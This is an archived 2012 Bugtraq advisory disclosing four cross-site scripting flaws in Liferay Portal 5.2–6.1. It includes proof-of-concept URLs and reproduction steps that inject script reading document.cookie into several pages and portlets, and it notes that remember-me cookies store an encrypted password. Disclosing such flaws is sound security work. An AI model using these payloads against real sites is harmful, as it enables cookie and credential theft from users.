lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 13 May 2012 12:12:21 +0200
From: Jelmer Kuperus <jelmer.advisories@...il.com>
To: BUGTRAQ@...urityfocus.com
Subject: Multiple xss issues in Liferay

Multiple xss issues in Liferay

Description:

Liferay Portal is an enterprise portal written in Java

Multiple xss vulnerabilities where found in liferay. Because liferay
has a "remember me"
option in their login screen that stores an encrypted password in a
cookie this is more
problematic than it otherwise would be

1. xss vulnerability in upload_progress_poller.jsp

http://vulnerablehost/html/portal/upload_progress_poller.jsp?uploadProgressId=a%3D1%3Balert%28document.cookie%29%3B%2F%2F

2. xss vulnerability in ckeditor.jsp

http://vulnerablehost?p_p_id=15&p_p_lifecycle=2&_15_struts_action=/journal/edit_article&ckEditorConfigFileName=ckconfig.jsp%27%2Ca%3Aalert%28document.cookie%29%2Cb%3A%27

3. xss vulnerability in the currency converter portlet

To reproduce :

Drag the currency converter on the home page then go to :

http://localhost:8080/web/guest/home?_16_chartId=%22/%3E%3Cscript%20type=%22text/javascript%22%3Ealert(123);%3C/script%3E&p_p_id=16&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&p_p_col_id=column-1&_16_struts_action=%2Fcurrency_converter%2Fview

4. xss vulnerability in the blog portlet

To reproduce :

1. Drag the blog on the home page,
2. create a blog and add this blog to a category.
3. Go to the list of blog posts, click on the link to category that
you assigned to the blog to,
4. append &tag=<script
type="text/javascript">alert(document.cookie)</script> to the url that
was created when you clicked on the link in step 3

Systems affected (by at least one of the vulnerabilities):

Liferay 6.1 ce
Liferay 6.1 ee
Liferay 6.0.x
Liferay 5.2.x

Vendor status :

Liferay  was notified april 12 2012 by filing a bugs in their public
bugtracker under issue numbers
LPS-27280, LPS-27281, LPS-27282, LPS-27283 The issues have not yet been resolved

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ